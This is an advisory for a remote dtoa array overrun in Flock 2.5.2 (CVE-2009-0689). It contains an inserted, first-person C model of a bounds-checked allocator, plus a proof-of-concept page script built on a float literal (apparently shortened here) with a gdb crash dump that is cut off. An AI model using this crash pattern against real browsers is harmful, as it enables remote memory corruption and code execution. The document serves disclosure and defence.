[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- Flock 2.5.2
Fixed in:
- Flock 2.5.5
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/75
--- 0. Description ---
Flock is a web browser built on Mozilla's Firefox codebase that
specializes in providing social networking and Web 2.0 facilities built
into its user interface. Flock v2.5 was officially released on May 19,
2009.
The Flock browser is available as a free download, and supports Microsoft Windows, Mac OS X, and Linux platforms.
--- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Flock has the same dtoa as Firefox, SeaMonkey, Chrome, Opera, etc.,
and it is the same issue as SREASONRES:20090625:
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar implementations is in SREASONRES:20091030:
http://securityreason.com/achievement_securityalert/69
We can create a floating-point number of any length, which will overwrite memory.
Kmax is defined as 15 in dtoa. The functions in dtoa don't check the Kmax limit,
so it is possible to reach elements of the freelist array at index 16 and above.
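To make the freelist bound concrete, here is a toy model of dtoa's Balloc/Bfree size-class cache together with the bounds check the vulnerable code lacked. This is an example added for this note, not Flock's, Mozilla's or netlib's code: the Kmax value, the freelist layout and the digit-to-size-class loop follow dtoa, but the function names (size_class_for_digits, balloc_checked, bfree_checked, cached_blocks_total and the round-trip helpers) and the simplified Bigint are mine. The hardened allocator serves any class above Kmax from plain malloc and never indexes freelist[] with it, which is the general shape of the later upstream fix.

```c
#include <stdio.h>
#include <stdlib.h>

/* Toy model of the Balloc/Bfree size-class cache in dtoa, constructed for
 * this note; not Flock's, Mozilla's or netlib's code. A Bigint of class k
 * holds 1 << k 32-bit words and, when freed, is parked on freelist[k] for
 * reuse. Kmax is 15, as in the advisory, so the array has Kmax + 1 = 16
 * slots: k = 16 is already one past the end. */
#define Kmax 15

typedef struct Bigint {
    struct Bigint *next;
    int k;              /* size class */
    int maxwds;         /* 1 << k words available in x[] */
    unsigned int x[1];  /* payload; allocated with (1 << k) words */
} Bigint;

static Bigint *freelist[Kmax + 1];

/* Size class that dtoa's s2b() derives from a decimal digit count nd: nine
 * digits fit one 32-bit word, and k is the smallest power of two covering
 * that many words. Class 15 runs out a little under 300,000 digits, so a
 * 300,000-digit literal already needs k = 16 and would index past the
 * 16-slot freelist in the unchecked code. */
int size_class_for_digits(long nd)
{
    long x = (nd + 8) / 9, y;
    int k;
    for (k = 0, y = 1; x > y; y <<= 1, k++)
        ;
    return k;
}

/* The check the vulnerable allocator lacked: is k a valid freelist index? */
int balloc_index_ok(int k)
{
    return k >= 0 && k <= Kmax;
}

/* Hardened allocator: only in-range classes touch the cache; anything larger
 * is served by plain malloc and never indexes freelist[]. */
Bigint *balloc_checked(int k)
{
    Bigint *rv;
    size_t words;
    if (k < 0 || k > 30)            /* refuse nonsense and overflow-prone sizes */
        return NULL;
    if (balloc_index_ok(k) && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;     /* reuse a cached block of this class */
        return rv;
    }
    words = (size_t)1 << k;
    rv = malloc(sizeof(Bigint) + (words - 1) * sizeof(unsigned int));
    if (rv == NULL)
        return NULL;
    rv->k = k;
    rv->maxwds = (int)words;
    return rv;
}

/* Symmetric release: oversized classes are freed outright, never cached. */
void bfree_checked(Bigint *v)
{
    if (v == NULL)
        return;
    if (balloc_index_ok(v->k)) {
        v->next = freelist[v->k];
        freelist[v->k] = v;
    } else {
        free(v);
    }
}

/* Blocks currently parked in slot k, or -1 for an out-of-range k. */
int freelist_len(int k)
{
    int n = 0;
    Bigint *p;
    if (!balloc_index_ok(k))
        return -1;
    for (p = freelist[k]; p != NULL; p = p->next)
        n++;
    return n;
}

/* Total cached blocks across all 16 slots. */
int cached_blocks_total(void)
{
    int k, n = 0;
    for (k = 0; k <= Kmax; k++)
        n += freelist_len(k);
    return n;
}

/* In-range class: a freed block must come back from the cache. Returns 1 on success. */
int reuse_roundtrip(void)
{
    Bigint *a = balloc_checked(3), *b;
    int ok;
    if (a == NULL)
        return 0;
    bfree_checked(a);
    b = balloc_checked(3);
    ok = (b == a) && freelist_len(3) == 0 && b->maxwds == 8;
    bfree_checked(b);
    return ok;
}

/* Class 16 (one past Kmax): must be served and released without the cache growing. */
int oversize_roundtrip(void)
{
    int before = cached_blocks_total();
    Bigint *b = balloc_checked(16);
    int ok = (b != NULL) && b->k == 16 && b->maxwds == 65536;
    bfree_checked(b);
    return ok && cached_blocks_total() == before;
}

int main(void)
{
    printf("k for 100 digits: %d\n", size_class_for_digits(100));
    printf("k for 300000 digits: %d (index ok: %d)\n",
           size_class_for_digits(300000), balloc_index_ok(size_class_for_digits(300000)));
    printf("reuse ok: %d, oversize ok: %d\n", reuse_roundtrip(), oversize_roundtrip());
    return 0;
}
```

The point to take from the model is that the size class is derived from attacker-controlled input length, so the allocator, not the parser, has to enforce the array bound; a cap in one caller (the first OpenBSD-style fix the advisory refers to) leaves every other path into Balloc unprotected.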
--- 2. Proof of Concept (PoC) ---
-----------------------
<script>
var a=0.;
</script>
-----------------------
Program received signal SIGSEGV, Segmentation fault.
0x67c68740 in js3250!JS_DHashTableEnumerate ()
from C:\Program Files\Flock\js3250.dll
(gdb) i r
eax 0x964619c7 -1773790777
ecx 0x2 2
edx 0x2 2
ebx 0x2 2
esp 0x20e7f0 0x20e7f0
ebp 0x1 0x1
esi 0x299d700 43636480
edi 0x299d701 43636481
eip 0x67c68740 0x67c68740 <js3250!JS_